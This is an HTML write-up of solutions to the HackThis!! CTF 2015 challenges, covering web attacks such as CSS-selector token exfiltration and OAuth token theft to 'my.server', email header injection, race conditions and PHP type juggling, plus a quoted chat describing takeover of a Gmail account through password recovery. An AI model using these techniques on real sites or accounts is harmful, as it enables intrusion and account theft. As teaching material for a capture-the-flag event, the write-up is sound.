
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    
    <title>HackThis!! CTF 2015 - Write-Ups/Tutorial</title>
    <!-- version 1.1 12-11-2015 -->

    <meta name="author" content="dloser">

    <style>
      body {
        margin: 8ex auto;
        width: 80ex;
        text-align: justify;
      }

      div {
        margin: 6ex auto;
      }

      pre {
        margin: auto 2ex;
      }

      .title {
        margin: 0ex auto;
      }

      .index li {
        padding: 0.4ex;
      }
      
      .tiny {
        margin: 2ex auto;
        font-size: xx-small;
        list-style-type: none;
      }

      .copyright {
        text-align: center;
      }
    </style>
  </head>
  <body>

    <h1 class="title">HackThis!! CTF 2015</h1>
    <h2 class="title">Write-Ups/Tutorial</h2>

    <div class="introduction">
      <p>
        During the <a href="https://www.hackthis.co.uk/">HackThis!!</a> CTF 2015, various people have asked me for hints and more. As they, and many before them, have noticed, I'm not a big supporter of giving them what they want. Even less so in the context of an event like this. The process of trying to figure things out for yourself is the most rewarding to me.
      </p>
      <p>
        Of course, not everyone has the same knowledge and experience. The nice part of a CTF running for a limited time is that we can draw a line where before things were spoilers and after things are lessons. Hopefully this document can provide some of you with some new insights and help you on your way to the next event.
      </p>
      <p>
        Many thanks to <a href="https://www.hackthis.co.uk/user/flabbyrabbit">flabbyrabbit</a> for a very entertaining CTF.
      </p>
    </div>



    <div class="index">
      <h2>Index</h2>
      <ul>
        <li><a href="#hidden">?. Openly hidden token</a></li>
        <li><a href="#t1">1. Mohammad Thomson - My Trains!!</a></li>
        <li><a href="#t2">2. Alexandra Bennett - Find this man</a></li>
        <li><a href="#t3">3. Kiera Holmes - Careful, they are watching us</a></li>
        <li><a href="#t5">5. Scott Berry - What the heck is this?</a></li>
        <li><a href="#t6">6. Leon Thompson - New 'secure' system</a></li>
        <li><a href="#t7">7. Anky1995 - Webdev scum</a></li>
        <li><a href="#t8">8. iecoo8Neam - I am trying to track down some personal info</a></li>
        <li><a href="#t9">9. bernieG - Come on the Greens!!</a></li>
        <li><a href="#t10">10. gressie - I want to know this guy's secrets</a></li>
        <li><a href="#t11_12">11/12. K Clark - Sick perverts</a></li>
        <li><a href="#t14">13. Mr Hutchings - School dilemma</a></li>
        <li><a href="#t14">14. olderpennine - Sexy keyboard</a></li>
        <li><a href="#t15a">15a. #Gman - Coding newbie (main)</a></li>
        <li><a href="#t15b">15b. #Gman - Coding newbie (script)</a></li>
        <li class="tiny">(Section numbers correspond to thread ids used in Mail+.)</li>
      </ul>
    </div>


    
    <div class="writeup">
      <a name="hidden"><h2>?. Openly hidden token</h2></a>
      <p>
        The section "Claiming a flag" on the home page gives an example flag. This turns out to be an actual flag. Sneaky!
      </p>
    </div>


    
    <div class="writeup">
      <a name="t1"><h2>1. Mohammad Thomson - My Trains!!</h2></a>
      <p>
        We are given an android app <tt>MySS.apk</tt>, which I would normally reverse engineer by using dex2jar and Jad. However, in this case the relevant information won't be found that way. The app is essentially nothing more than a wrapped web app whose sources can be gotten straight from the APK file. 
      </p>
      <p>
        An APK file is just a zip file (similar to a JAR file), so we can unzip it and view the contents. In this case we are interested in the files in <tt>assets/www/</tt>. Here we have a pretty basic <tt>index.html</tt>, some font files and a bunch of scripts. Now most of the script files have some nice comments at the start, so they are probably just standard libraries and aren't a priority to look at.
      </p>
      <p>
        The only exception is <tt>scripts.js</tt>. Examining it shows that the code has been obfuscated, but luckily not that well. I made a little tool to clean things up a bit, but there might be similar (and better) tools on the web. All my tool does is take the array on the first line, decode the elements and substitute them in the rest of the file where they are used. Here is my quick&amp;dirty Python code:
      </p>
      <pre>
import re

js = open('files/assets/www/scripts.js').read()
array, rest = js.split(';',1)

strings = eval(array.split('=')[1])

def subst(m):
  return repr(strings[int(m.group(1))])
rest = re.sub('_0x18c8\[(\d*)\]',subst,rest)

print rest
      </pre>
      <p>
        After doing some basic layout improvement (<tt>s/[{}]/\n&amp;\n/g</tt>, but a pretty printer would be better), looking through the result, you can find three URLs and POST parameters:
      </p>
      <ul>
        <li><tt>http://ctf.hackthis.co.uk/MySS/index.php?action=register</tt>, with <tt>user</tt>, <tt>pass</tt></li>
        <li><tt>http://ctf.hackthis.co.uk/MySS/index.php?action=login</tt>, with <tt>user</tt>, <tt>pass</tt></li>
        <li><tt>http://ctf.hackthis.co.uk/MySS/index.php?action=getDetails</tt>, with <tt>id</tt>, <tt>hash</tt></li>
      </ul>
      <p>
        After registering an account and some experimenting, one can notice that once you have a hash for <tt>getDetails</tt>, you can change the id to anything. I haven't found a way to directly get the id for MrTrain, so I just enumerated the ids one by one until I found him. Once found, checking the images to get the required information is easy.
      </p>
    </div>


    
    <div class="writeup">
      <a name="t2"><h2>2. Alexandra Bennett - Find this man</h2></a>
      <p>
        Time to hit the Google! From what I gather the search results may vary a bit depending on your localisation and personalisation. Also, there seems to have been some joker making fake accounts with misleading information.
      </p>
      <p>
        For me the full mail address didn't give any results, but just the name <tt>stoyanisawesome</tt> gave me a <a href="https://twitter.com/stoyanisawesome">twitter</a> and a <a href="https://www.flickr.com/photos/stoyanisawesome">flickr account</a> (although I don't remember getting his flickr on my first tries). Twitter gives us a partial name &quot;Stoyan J&quot; and a posted picture that suggests a flickr account (if you didn't find it already).
      </p>
      <p>
        The flickr account gives us his full name: Stoyan Jefferson. He also has a nice album with in the description the information that he just moved &quot;there&quot;. In it, one of the pictures is of a statue with a plaque captioned &quot;The Jester&quot;. Searching for &quot;the jester statue&quot; brought me to an <a href="https://commons.wikimedia.org/wiki/File:Jester_statue,_Stratford-upon-Avon_-_DSC08930.JPG">image</a> of the statue on wikimedia, which has the description &quot;The Jester Statue on Henley Street, Stratford-upon-Avon, England.&quot; So it appears Stoyan has moved to Stratford-upon-Avon.
      </p>
      <p>
        The last part is where a lot of people struggle, including myself. Just using search engines doesn't seem to get you there. Eventually, I just started checking the various social-media sites manually. Even that seemed to fail until I saw some other Stoyan's Facebook address and figured I could simply try changing the lastname to Jefferson and indeed get his <a href="https://www.facebook.com/stoyan.jefferson">page</a>. Just searching on Facebook itself doesn't seem to work.
      </p>
      <p>
        On his Facebook we can see a post from June 6 where he hints at his birthday by saying &quot;So full of cake!! Thanks everyone for coming&quot;. We already know that he's 31 from the task description, so his birthday should be on June 6, 1984.
      </p>
      <p>
        Only thing left is entering the information we found. Some were struggling with finding the right date format, but didn't realise they had actually found the wrong date. The checker seems to accept various formats and the day and the month both being 6 avoids problems with silly formats that swap the two. Formats such as &quot;June 6, 1984&quot;, &quot;06-06-1984&quot; and &quot;06/06/1984&quot; all work.
      </p>
      <p>
        One special mention is deserved by <a href="https://www.hackthis.co.uk/user/ransetsu">ransetsu</a>. Instead of doing the above, he managed to exploit the password recovery for one of the e-mail addresses:
<pre>
&lt;ransetsu&gt; so basically i went though password recovery on facebook first.
           found out that the email for the facebook account started with an s
           and ended with an n
&lt;ransetsu&gt; and was exactly as long as his name with no spaces
&lt;ransetsu&gt; went to gmail recovery and found out that that that account had a
           recovery email that started with an s and ended with an e
&lt;ransetsu&gt; aka stoyanisawesome@gmail.com
&lt;ransetsu&gt; went through pass recovery on that one. it asked me for an old
           pass. i clicked i dont know
&lt;ransetsu&gt; it then asked when you last had access to this account MM/DD/YY and
           when it was created MM/YY
&lt;ransetsu&gt; and i guess i guessed it accurately based on the creation date of
           the twitter page
&lt;dloser&gt; oO
&lt;ransetsu&gt; then it asked me to put in an email you want the recovery link sent
           to
&lt;ransetsu&gt; and the rest doesn't need explaining
</pre>
      </p>
    </div>


    
    <div class="writeup">
      <a name="t3"><h2>3. Kiera Holmes - Careful, they are watching us</h2></a>
      <p>
        This one isn't too hard if you are familiar with <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy">PGP</a>. If you are not, you'll have to read up a bit and perhaps install some software. I'm using <tt>gpg</tt> on Linux here.
      </p>
      <p>
        The first step is finding Kiera's public key. She said it would be easy to find, so it should be posted somewhere online. Typically this is done on a public <a href="https://en.wikipedia.org/wiki/Key_server_(cryptographic)">key server</a>. If you check the most used servers, you should find her key. Googling &quot;pgp key server&quot; gives me <a href="http://pgp.mit.edu/">MIT's server</a> as top result, so that too is an easy path to success. Even easier is using your software if it has key servers preconfigured (e.g.: <tt>gpg --recv-key 'Kiera Holmes'</tt>) 
      </p>
      <p>
        If you are doing it manually, searching for &quot;Kiera Holmes&quot; on the key server should give you her key. After downloading, you import it with <tt>gpg --import &lt; key</tt>. Now you can send her encrypted messages. I did this with <tt>gpg -a -e -r 'Kiera Holmes' &gt; msg</tt>. See <a href="https://www.gnupg.org/documentation/manpage.html"><tt>man gpg</tt></a> for the meaning of the options.
      </p>
      <p>
        Now, to properly communicate we need a key of our own and upload it to the key server. If you haven't got one already, you can generate a new one with <tt>gpg --gen-key</tt>. Once you have one, you can export it with <tt>gpg -a --export &lt;key name/id&gt;</tt> and upload it. That, or use <tt>gpg --send-keys</tt>.
      </p>
      <p>
        All that remains is sending Kiera a message with our key's fingerprint (<tt>gpg --fingerprint</tt>; no spaces). If done right, Kiera will reply soon after with the flag in an encrypted message, which you can read with <tt>gpg -d &lt; msg</tt>.
    </div>


    
    <div class="writeup">
      <a name="t5"><h2>5. Scott Berry - What the heck is this?</h2></a>
      <p>
        Easy to confuse with something like a simple substitution cipher, but the hint about onions should make you think. By now you can also just search for the string and notice that it is an <a href="https://en.wikipedia.org/wiki/.onion">onion address</a> for a <a href="https://en.wikipedia.org/wiki/Tor_(anonymity_network)">Tor service</a>.
      </p>
      <p>
        If you don't have Tor installed, you can simply use one of the available <a href="https://en.wikipedia.org/wiki/.onion#WWW_to_.onion_gateways">gateways</a>.
      </p>
    </div>


    
    <div class="writeup">
      <a name="t6"><h2>6. Leon Thompson - New 'secure' system</h2></a>
      <p>
        Here we are presented with an encryption service. We can encrypt messages to anyone as well as create new accounts. However, we are not supplied with a way to decrypt messages, even if we have a key. Only thing we are told is that AES-128 is used.
      </p>
      <p>
        By playing a bit with messages of varying length and minor variations, you should observe the following two crucial properties. One is that length of input directly corresponds with length of output. The other is that changing a single character in the input only changes a single character in the output (of course, after base64 decoded).
      </p>
      <p>
        For the more experienced, this will clearly point at a stream cipher. If you are less experienced and read about AES, you'll see that it is a block cipher. Which is odd because that would suggest that the output size is always a multiple of the block size, which is not the case here. Searching for &quot;AES stream&quot;, you'll find that there are ways to turn a block cipher into a stream cipher. For example, check out the <a href="https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation">OFB and CTR</a> modes.
      </p>
      <p>
        In the case of a stream cipher where input bytes and output bytes are directly related (our second property), the actual cipher isn't that important. All you need to know is that there is a key stream generated based purely on the static key (i.e. every message uses the same key stream). Typically the bytes of this key stream are xorred with the bytes of the input message to get the output message. This means that if we have an input message and the corresponding output message, we can get the key stream by xorring the input and output message together.
      </p>
      <p>
        After trying this out with some example messages, you'll find that this indeed works. Encrypting a long input message and xorring it with the output message gives a key stream that allows the decryption of other messages for that same user. All that is left now is encrypting such a long message for each of the users and we can decrypt all messages and read the flag.
      </p>
    </div>


    
    <div class="writeup">
      <a name="t7"><h2>7. Anky1995 - Webdev scum</h2></a>
      <p>
        We are given a site with just a login, a password reset form and a link to Adam's site. The login doesn't seem to susceptible to any attacks, so we try and see if we can guess a username for the reset. It took me quite a while to finally try <tt>trapezoid</tt>, which gives the interesting task of providing a file on this site with a certain key in it.
      </p>
      <p>
        If we check Adam's site, we'll notice a link to GitHub. There we conveniently find the sources of his website. The only really interesting part is a file <tt>upload.php</tt>, which allows us to upload any file, but doesn't give us any control over the name and location where it will end up. We can try and upload some PHP or something, but unfortunately the server isn't going to execute it for us. Just in case it will be useful, let's upload a file with the key from trapezoid and assume it is located in <tt>upload_XXXXXX</tt>.
      </p>
      <p>
        Now comes the tricky part. When we play with the trapezoid URI form, we see that we are stuck with something starting with <tt>http://trapezoid.&lt;id&gt;.ctf.hackthis.co.uk/</tt>. Things like <tt>../../adam/public_html/upload/upload_XXXXXXX</tt> are of no use because the server considers trapezoid's web directory as root. The best hint on what to do is in the <tt>public_html</tt> directory we found in the <tt>upload.php</tt> source.
      </p>
      <p>
        What you should know is that on (typically) *nix systems, there is a common way to provide users with a website on a server. This is by mapping a <tt>public_html</tt> directory in their home directory to a subdirectory on some HTTP server. The subdirectory name is chosen in correspondence to the way one refers to a user's home directory on *nix: <tt>~username</tt>. If we try this out on trapezoid by going to <tt>http://trapezoid.&lt;id&gt;.ctf.hackthis.co.uk/~adam</tt>, we see that we indeed get Adam's website. If we now put <tt>upload/upload_XXXXXX</tt> after it and submit it in the reset form, we get access to <tt>area.php</tt>
      </p>
      <p>
        The final step is to deface the website by editing the home page. While trying various things you'll get comments in Mail+ on the result. I've mainly gotten "loose the footer" and "what is that image doing there". Only a few tags are allowed. Probably the easiest method is to make the rest of the page part of a hidden div: <tt>&lt;div style='display:none;'&gt;&lt;div&gt;</tt> The first <tt>div</tt> is for the hiding, the second to take care of the <tt>&lt;/div&gt;</tt> tag immediately following our input in the source.
      </p>
    </div>



    <div class="writeup">
      <a name="t8"><h2>8. iecoo8Neam - I am trying to track down some personal info</h2></a>
      <p>
        On <tt>modster</tt> it's actually not that hard to find some kind of injection. Both in the name part of the menu and the &quot;About you&quot; <tt>textarea</tt> XSS is possible. The only problem is that this is only in effect when you are logged in as that particular user. So unless you can update Amy's profile with it, it won't be much use. And updating her profile is the whole goal anyway.
      </p>
      <p>
        Most of the other places where our input is used are actually properly escaped. The only place that isn't is the &quot;About you&quot; section in the profile (not the edit part). Playing with this field shows that there is some interesting sanitisation going on. Only a few tags and attributes are allowed. Things like images, links and styles are all possible, but as soon as you try to do something interesting with javascript it gets removed.
      </p>
      <p>
        Because the behaviour of the sanitisation seemed so sophisticated, I decided to see if this was some third-party library. Hopefully one that has some known vulnerability. As far as I can tell from the behaviour and the comments in the release notes, it looks like <a href="http://htmlpurifier.org/">HTML Purifier 4.6.0</a>. Unless you have a nice 0-day, that's some bad luck.
      </p>
      <p>
        Looks like we'll have to do with what we are allowed. We can include images using the <tt>img</tt> tag as well as with CSS, and with it we can see that Amy (presumably) is checking our page when we modify it. As the profile updates happen with GET, this seems to point in the right direction. The only problem we have is that the request has a <tt>save</tt> parameter that requires the user's token. 
      </p>
      <p>
        How to get the token without JavaScript? The only place we know where the token is available is in the edit form when Amy is logged in. All we really have to work with is CSS. So can we somehow get the value with CSS? Well, not quite, but we can have CSS do things based on that value. With <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/Attribute_selectors">attribute selectors</a> we can check against values and partial values. This allows us to piece together the token digit by digit. I've used the <tt>^=</tt> operator that selects based on a prefix:
      </p>
      <pre>
&lt;style&gt;
input[value^=&quot;0&quot;] { background: url(http://my.server/0); }
input[value^=&quot;1&quot;] { background: url(http://my.server/1); }
input[value^=&quot;2&quot;] { background: url(http://my.server/2); }
input[value^=&quot;3&quot;] { background: url(http://my.server/3); }
input[value^=&quot;4&quot;] { background: url(http://my.server/4); }
input[value^=&quot;5&quot;] { background: url(http://my.server/5); }
input[value^=&quot;6&quot;] { background: url(http://my.server/6); }
input[value^=&quot;7&quot;] { background: url(http://my.server/7); }
input[value^=&quot;8&quot;] { background: url(http://my.server/8); }
input[value^=&quot;9&quot;] { background: url(http://my.server/9); }
&lt;/style&gt;
      </pre>
      <p>
        This means that based on the first digit of the token, we set a background image that is specific for that digit. Note that I didn't specify which input should be looked at, but none of the other parts of Amy's profile starts with a digit. Once we get a request to one of the addresses, we know the first digit and repeat the process, but adding that digit to the prefixes in the CSS. Of course, you can try to do two or more digits at the same time, but it isn't really worth the gain.
      </p>
      <p>
        Once we have found all digits, we can include an image with the address for the profile update: <tt>http://modster.&lt;id&gt;.ctf.hackthis.co.uk/profile/amy?name=notamy&amp;save=&lt;token&gt;</tt> Note that you don't have to include all the fields to make the update, as you can find out by testing with your own profile.
      </p>
    </div>



    <div class="writeup">
      <a name="t9"><h2>9. bernieG - Come on the Greens!!</h2></a>
      <p>
        On this voting site we really only have two actions we can perform. One is to vote for someone (<tt>index.php?vote=&lt;id&gt;</tt>), the other is to retract that vote (<tt>index.php?unvote=true</tt>). We haven't gotten a special cookie that registers the vote and voting when already voted isn't effective. Playing around a bit with the vote id doesn't seem to result in anything special either.
      </p>
      <p>
        This really doesn't leave us much to work with except the timing of the votes. Perhaps a race condition is possible, for example because voting isn't a single <a href="https://en.wikipedia.org/wiki/ACID">isolated</a> action, like <tt>db.add_vote(id); db.set_voted(true)</tt>. I tried this with the available jQuery using the development console of Chrome by running, as a single line: <tt>$.post('index.php', {'vote': 5}); $.post('index.php', {'vote': 5});</tt> And what do you know, I voted twice! Note that jQuery requests are per default asynchronous; otherwise this wouldn't have worked this way.
      </p>
      <p>
        In my case, it turned out that i could only cast 4/5 votes at a time before i had to unvote. So effectively only 3/4 votes were added. This probably depends on your connection and how busy the server is. The initial number of votes of id 5 weren't that far from being the top, so I just manually executed the statements in the console until I had enough. Of course, it is easy enough to automate this if you want to.
      </p>
    </div>



    <div class="writeup">
      <a name="t10"><h2>10. gressie - I want to know this guy's secrets</h2></a>
      <p>
        If we look at the details we can see that most things are pretty standard. The only thing that is interesting is that apparently the client has sent an <tt>Allow</tt> header with the value <tt>secrets</tt>. It's extra weird because normally only a server sends this header. Other things we can see are the client IP address and port, the user agent, some additional standard headers and a request time. The rest of the information is about the server itself and doesn't tell us anything about the person visiting.
      </p>
      <p>
        Just connecting to the site with the <tt>Allow</tt> header doesn't give any results. Other things I tried is using a method like <tt>SECRET</tt> instead of <tt>GET</tt>, because that's what the <tt>Allow</tt> header is normally about. No luck with that either. Also not with various guesses at script names or directories.
      </p>
      <p>
        Clearly we need more or different information. Thinking about what kind of ways one can use to restrict access, one of the options could be to check certain things like IP address and user agent. The user agent is easy to change, but the IP won't be possible. That is, unless it doesn't only look at the real IP address, but also checks if you are using a proxy. Proxies can send headers like <tt>X-Forwarded-For</tt> to let the server know about the real origin of the request.
      </p>
      <p>
        Just to be sure, I tried to supply as much of the information we've got in my request, including the <tt>Allow</tt> and a <tt>X-Forwarded-For</tt>. This gave me the flag. Experimenting a bit more showed that only the <tt>Allow</tt> and <tt>X-Forwarded-For</tt> headers that make the difference.
      </p>
    </div>



    <div class="writeup">
      <a name="t11_12"><h2>11/12. K Clark - Sick perverts</h2></a>
      <p>
        For this task we should observe two main things. The first is that access to the site is via some <a href="https://en.wikipedia.org/wiki/OAuth">OAuth</a> system using a site called <tt>passbook</tt>. The other is a little less obvious, but at the bottom of <tt>ratemyex</tt> pages we can see links the use some redirection system provided by <tt>out.php</tt>.
      </p>
      <p>
        The redirect with <tt>out.php</tt> is fairly straightforward. The parameters are an address to redirect to and an hash to validate that this address is allowed. The OAuth part has the following flow:
      </p>
      <ol type="1">
        <li><tt>ratemyex</tt> sends a user to <tt>http://passbook.&lt;id&gt;.ctf.hackthis.co.uk/?popup&amp;clientID=gnNbefv_seyQrIk_JRH9zADk&amp;redirect_uri=http://ratemyex.&lt;id&gt;.ctf.hackthis.co.uk/oauth.php</tt>.</li>
        <li><tt>passbook</tt> asks the user to log in and allow <tt>ratemyex</tt>, if needed, generates a token and passes that on to <tt>http://ratemyex.&lt;id&gt;.ctf.hackthis.co.uk/oauth.php?token=&lt;token&gt;</tt>.</li>
        <li><tt>ratemyex</tt> uses the token to get the user information from <tt>passbook</tt> and logs the appropriate user in.</li>
      </ol>
      <p>
        When we log in, we can see that the only option we really have is to send a contact message. This message will be send to KingPimp, who will respond in Mail+. After this first message, you can also directly mail KingPimp from Mail+. His responses should make clear that he only expects a link and that that link has to be to his own site.
      </p>
      <p>
        Given all this, it should be reasonably clear that we have to abuse this functionality to make KingPimp go somewhere such that we can steal his token and log in with that. As he only accepts links from his own site, we'll examine <tt>out.php</tt> to see if we can use it with other addresses.
      </p>
      <p>
        Manipulating the <tt>p</tt> parameter to <tt>out.php</tt>, we can find out that it makes sure that it is a valid URI and that the hostname isn't manipulated with. It is likely that it does this by checking it against the <tt>h</tt> parameter, which looks like a CRC32 value. However, if you make a mistake like I did and don't come to the conclusion that it is, you can try something like the following in PHP:
      </p>
      <pre>
foreach (hash_algos() as $ha)
{
  echo "$ha ".hash($ha,"templated.co")."\n";
}
      </pre>
      <p>
        Now knowing that it is a CRC32 value, we can confirm that we can substitute another address if we change <tt>h</tt> to the CRC32 of the hostname of that address. This means we can redirect KingPimp to anywhere we like.
      </p>
      <p>
        As we want KingPimp's token, it's logical to try and redirect him to <tt>passbook</tt>, but we'll have to make sure that we get the token instead of him. This means it is time to see if we can manipulate the <tt>redirect_uri</tt> parameter of <tt>passbook</tt>. It is very similar to the <tt>p</tt> parameter of <tt>ratemyex</tt>'s <tt>out.php</tt>, but this time the hostname seems to be checked against the <tt>clientID</tt>. The clientID doesn't look like any obvious thing such as a hash and is probably just some random string used for database lookups. Fortunately, it accepts <tt>ratemyex</tt> addresses and we can just use our previously exploited <tt>out.php</tt>.
      </p>
      <p>
        Now we need to put it all together. I've done it in such a way that the first redirect goes to my server, which again redirects to <tt>passbook</tt>. This keep the address we send to KingPimp short and allows me to fiddle more easily on my server with the redirect and what not. The end result is the following:
      </p>
      <ol type="1">
        <li>We send KingPimp a message with the link <tt>http://ratemyex.&lt;id&gt;.ctf.hackthis.co.uk/out.php?p=http://my.server/awesome&amp;h=de262a36</tt></li>
        <li>Clicking on the link redirects KingPimp to <tt>http://passbook.&lt;id&gt;.ctf.hackthis.co.uk/?popup&amp;clientID=gnNbefv_seyQrIk_JRH9zADk&amp;redirect_uri=http://ratemyex.&lt;id&gt;.ctf.hackthis.co.uk/out.php?h=de262a36&amp;p=http://my.server/gimme</tt>.</li>
        <li>Now <tt>passbook</tt> will see KingPimp requesting a token, so KingPimp's token is passed on by redirecting to <tt>http://ratemyex.&lt;id&gt;.ctf.hackthis.co.uk/out.php?h=de262a36&amp;p=http://my.server/gimme?token=&lt;token&gt;</tt>
        <li>A final redirect brings KingPimp to <tt>http://my.server/gimme?token=&lt;token&gt;</tt>, and we have what we want.
      </ol>
      <p>
        Something to note is that <tt>passbook</tt> appends <tt>?&lt;token&gt;</tt> to <tt>redirect_uri</tt>, so we have to make sure that it becomes part of our token-capturing address. This is why the order of the parameters <tt>p</tt> and <tt>h</tt> has to be swapped around.
      </p>
      <p>
        With the token we can now log in as KingPimp by going to <tt>http://ratemyex.&lt;id&gt;.ctf.hackthis.co.uk/out.php?token=&lt;token&gt;</tt> and remove Clark from the list.
      </p>
    </div>



    <div class="writeup">
      <a name="t14"><h2>13. Mr Hutchings - School dilemma</h2></a>
      <p>
        A contact form. First thing I considered was that it could be a classic one were we can inject extra headers using new-lines. I typically use <tt>curl</tt> on the command line for these tests. We set the email parameter to <tt>me@mail.com%0aTo:me@mail.com</tt> (using you own address, of course) and see what happens. Hopefully the mail will be generated by adding something like <tt>'From: '.$_POST['email']</tt> without any filtering. The extra <tt>To:</tt> might result in a copy of the mail to <tt>me@mail.com</tt>.
      </p>
      <p>
        What happens is that we indeed get a copy of the mail. In the mail we can see that it is sent to three additional addresses. Sending those to Hutchings will get us the flag.
      </p>
      <p>
        One thing to note is that this doesn't work when you put a space after the &quot;To:&quot;.
      </p>
    </div>



    <div class="writeup">
      <a name="t14"><h2>14. olderpennine - Sexy keyboard</h2></a>
      <p>
        All we are given is an image, which immediately suggest steganography. If we analyse the image with our standard techniques, we don't find anything at all. However, because it doesn't seem to be a custom image specifically made for the challenge, we have some extra information: the original image. A quick search for the name in the image should point you directly to the <a href="http://assets.razerzone.com/eeimages/home/5/razer-blackwidow-ultimate-chroma-banner-main-page.png">original image</a> on Razer's site.
      </p>
      <p>
        With the original image, we can do an comparison. I used GIMP for this. I copied one of the images into a new layer in the other image and set the mode to difference. Then I merged the two layers and normalised the colours. Two lines of spaced out pixels appear. At this point I switch to python to easily get the different pixels and be able to play with it. This is the code I start with:
      </p>
      <pre>
import Image

img1 = Image.open('razer.php')
W,H = img1.size
d1 = img1.load()
img2 = Image.open('razer.png') # original
d2 = img2.load()

for y in range(0,H):
  for x in range(0,W):
    if d1[x,y] != d2[x,y]:
      print x,y,d1[x,y],d2[x,y]
      </pre>
      <p>
        Looking at the differences, we can see that in the edited image all the green components are 1 lower than in the original (except when the original was 0). There can't really be any information in that but to serve as an indication of the interesting pixels. So we'll have to look at the pixel values and coordinates. Because of the particular spacing, the latter seems a logical starting point.
      </p>
      <p>
        The spacing isn't constant, but does seem to be roughly 100 in many steps. Hoping for some ASCII, we can compute the distances between pixels and see what comes up. And what comes up looks an awful lot like a flag. The only slightly tricky part is the transition from the first line of pixels to the next one, but a <tt>% W</tt> solves that easily.
      </p>
      <p>
        Note that the link for the image is a PHP file. Some thought this might be of some significance, but it is just so you get your own specific image with custom flag.
      </p>
    </div>



    <div class="writeup">
      <a name="t15a"><h2>15a. #Gman - Coding newbie (main)</h2></a>
      <p>
        For a newbie, his code isn't all that bad. The prepared SQL statements make SQL injection very unlikely, so we need some careful analysis. Looking at the login part, starting from our goal to get admin, we see that we need a value for <tt>limited</tt> that evaluates to false. There is only one place where the this value is set, and that is on line 39, where it will always get the default value <tt>1</tt>, which is exactly what we don't want.
      </p>
      <p>
        To avoid giving <tt>limited</tt> the value <tt>1</tt>, our only option seems to be to avoid having the INSERT of it happen successfully. We do, however, need a user without this value, so we probably can't avoid executing the INSERT. Because the inserted id is used as key, it has to be unique. Inserting an id that is already there, should result in a failure. Then again, if it is already there, it should have the value <tt>1</tt> and the username should already have been registered before. If that was the case we wouldn't be inside this <tt>if</tt>.
      </p>
      <p>
        The key to the solution for this is in the data types. If you look at the <a href="https://dev.mysql.com/doc/refman/5.7/en/storage-requirements.html">MySQL documentation</a>, you can see that TEXT columns can only hold up to 2<sup>16</sup> characters. This raises the question what happens when you try to insert more, to which the answer is that the input is truncated.
      </p>
      <p>
        Here we run into a problem with the challenge, unfortunately. It turns out that the displayed code wouldn't work with MySQL and if it would, it wouldn't behave like it does in the challenge. The TEXT UNIQUE column isn't allowed, and trying to insert duplicate (after truncation) elements results in an error.
      </p>
      <p>
        If we assume that it does, like in the challenge, then we have our solution. Register a user whose name is 65535 characters long with one password, then register a user whose name is the same but with one extra character and with a different password. What happens on the second registration is that the new name is not found in the table, but when inserting it gets truncated and turns into a duplicate of the first name. So now there are two users with the same name, but different ids and passwords.
      </p>
      <p>
        The following select to get the id for the new user, will actually turn up with nothing (because it searches for longer second name), which will result in a failure to insert the entry into <tt>usersPriv</tt>. All we have to do then is login with the truncated name and the second password. This will return the second user, but its id won't be found in <tt>usersPriv</tt>, which makes us admin.
      </p>
    </div>



    <div class="writeup">
      <a name="t15b"><h2>15b. #Gman - Coding newbie (script)</h2></a>
      <p>
        The first part of this challenge is finding the source of <tt>script.php</tt>. We are given the information that #Gman switched to <tt>nano</tt>, so a good place to start is to check the <a href="http://www.nano-editor.org/dist/v2.2/nano.1.html">manual</a> of <tt>nano</tt> to see if it leaves behind some interesting files. There are various options, but the one that eventually works is <tt>script.php.save</tt>.
      </p>
      <p>
        At first glance, the condition of the <tt>if</tt> might appear impossible to satisfy, but PHP wouldn't be PHP if seemingly normal code didn't have all kinds of undesired special cases. The problem is that one is tempted to think only in strings. However, you can't only POST strings; <a href="http://php.net/manual/en/language.variables.external.php">arrays</a> are also an option!
      </p>
      <p>
        Simply passing any array as the <tt>secret</tt> parameter will work (e.g.: <tt>?secret[]=</tt>). Both <tt>strpos</tt> and <tt>strlen</tt> don't know what to do with it and return <tt>NULL</tt>, which makes us get another flag.
      </p>
    </div>



    <div class="copyright">
      &copy; 2015 <a href="https://www.wechall.net/profile/dloser">dloser</a>
    </div>

  </body>
</html>

